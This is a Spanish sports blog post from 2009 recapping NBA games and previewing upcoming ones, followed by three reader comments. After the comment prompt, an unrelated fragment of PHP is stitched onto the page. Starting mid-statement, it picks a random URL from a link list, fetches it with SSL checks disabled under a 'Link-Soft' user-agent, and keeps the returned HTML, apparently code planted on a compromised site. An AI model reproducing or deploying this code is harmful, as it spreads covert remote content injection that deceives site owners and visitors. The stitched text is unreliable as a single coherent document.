La crónica (26/02/2009)

27 de February de 2009 por MagicJohnson32

Por TheDeerHunter & MagicJohnson32

No, al final Nash no jugó ante los Lakers, y sin el canadiense los Suns son como pollos sin cabeza. No estuvo Nash, como tampoco estuvo Amaré y difícilmente podemos decir que estuviera alguno de sus compañeros anoche. No hubo color y en el primer cuarto los Suns ya habían encajado 40 puntos. Al entrar la segunda unidad la situación no mejoró y Phil Jackson pudo pronto dedicarse a administrar los minutos de sus titulares. Brown, Morrison e incluso Mbenga disfrutaron de buenos minutos. Es cierto que Gentry ha logrado mejorar mínimamente la imagen del equipo, al menos ofensivamente, pero la defensa es para tirarse de los pelos y va camino de ser otro run & gun sin sentido. Creíamos que ya teníamos completo el cupo.

Y sí, la defensa de Artest/Battier y en general de los Rockets logró parar a LeBron. Para colmo, volvía Delonte, pero Ben Wallace se rompió la pierna en el segundo cuarto (estará entre 4 y 6 semanas de baja) y Yao se puso las botas en la zona de los Cavs. 13 de 15 en tiros, ahí es nada. Entre Mo y James hicieron 15 de 39, pero lo de sus compañeros fue aún peor con 12-41. Con un 33% en tiros, tus posibilidades de ganar son las mismas de que te toque la lotería. Ese es el gran defecto de los Cavaliers y ya lo hemos visto en varias ocasiones esta temporada. Seguro que sus posibles rivales ya han tomando buena nota de cara a las eliminatorias.

En definitiva, los líderes Lakers son hoy más líderes. Quedan 24 partidos y vienen ganando un 83% de los que juegan. Si confiamos en la fría estadística perderían 5 más. Teóricamente les falta menos para asegurarse ventaja campo en todas las series. Teóricamente.

PREMIOS

MVP: Pese a la tentación de dar el galardón a Artest por su defensa sobre LeBron, premiaremos el baloncesto espectáculo de la pareja Odom & Kobe. Entre los dos anotaron 45 puntos con un impresionante 21 de 25 en tiros de campo, a los que añadieron 13 rebotes, 12 asistencias, 3 robos y 3 tapones. Y todo ello sin que ninguno de los dos jugase más de 32 minutos. También fue determinante y extremadamente eficaz Yao, que anotó 13 de sus 15 tiros de campo.

El rookie: Alando Tucker, que había jugado un total de 7 minutos en los últimos cuatro partidos, se encontró con la titularidad y tiempo para demostrar cosas. En 32 minutos anotó 16 puntos con 7 de 11 en tiros, incluyendo 2 triples, y atrapó 4 rebotes.

La sorpresa: Nos quedaremos con los buenos minutos de Jared Dudley, que logró 13 puntos, 8 rebotes, 2 asistencias, 2 robos y un tapón partiendo desde el banco.

La decepción: 33% en tiros de campo, 1 rebote, 0 asistencias y un -14 de parcial encajado con él en pista. ¿Dónde está el verdadero LeBron y quién era el individuo que le suplantó anoche en el Toyota Center?

El mayor esfuerzo en vano: Entre los perdedores, el mejor de la noche fue posiblemente Mo Williams, autor de 21 puntos, 4 rebotes, 4 asistencias y 2 robos.

RAZONES PARA TRASNOCHAR

Esperamos que no arrastréis mucho sueño porque la próxima es una noche para pasar en blanco. Se disputan 13 partidos y entran en juego todos los candidatos. Estaremos atentos a los Pistons, que viajan a Orlando con no muchas esperanzas de cortar su racha negativa (por cierto, televisado por D+ y Cuatro), pero nuestro partido recomendado de la noche no es éste sino…

Lakers @ Nuggets. El morbo que supone cada visita de Kobe a Denver, donde acostumbra a brillar, y la eliminatoria de primera ronda de los pasados Playoffs en la que los Nuggets fueron barridos a manos de los Lakers, otorgan más atractivo si cabe a este enfrentamiento entre el primero y el tercero del Oeste. Nene podría regresar a tiempo de complicarle las cosas a Pau. El partido arranca a las 3:00 horas (GMT+1).

El jugador que más conviene seguir de cerca es… LeBron James, obviamente. No sólo llegará motivado tras su mala actuación en Houston, sino también por visitar (3:30 horas) a los Spurs, el equipo ante el cual fue barrido en las Finales de 2007. Los Spurs esperan recuperar a Duncan para la ocasión. Y más les vale.

Comenta

3 comentarios a esta entrada

  1. Sabas dice:
    #1

    Alguien sabe como va la recuperacion de Bynum y para cuanto tiene. Porque al paso que va Gasol (excepto hoy) llega fundido a play off.

      Citar

  2. Sergio dice:
    #2

    los celtics han fichado a marbury… eso es bueno o malo?

      Citar

  3. Viva_Dirk dice:
    #3

    Veremos que pasa, a mi no me cuadra demasiado el fichaje la verdad. Desde luego que si vuelve como la mitad de jugador que era antes han dado un paso enorme en la 2ª unidad, pero si llega mal y le resta protagonismo a un House que lo estaba haciendo muy bien creo que se meten en un lio innecesario.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>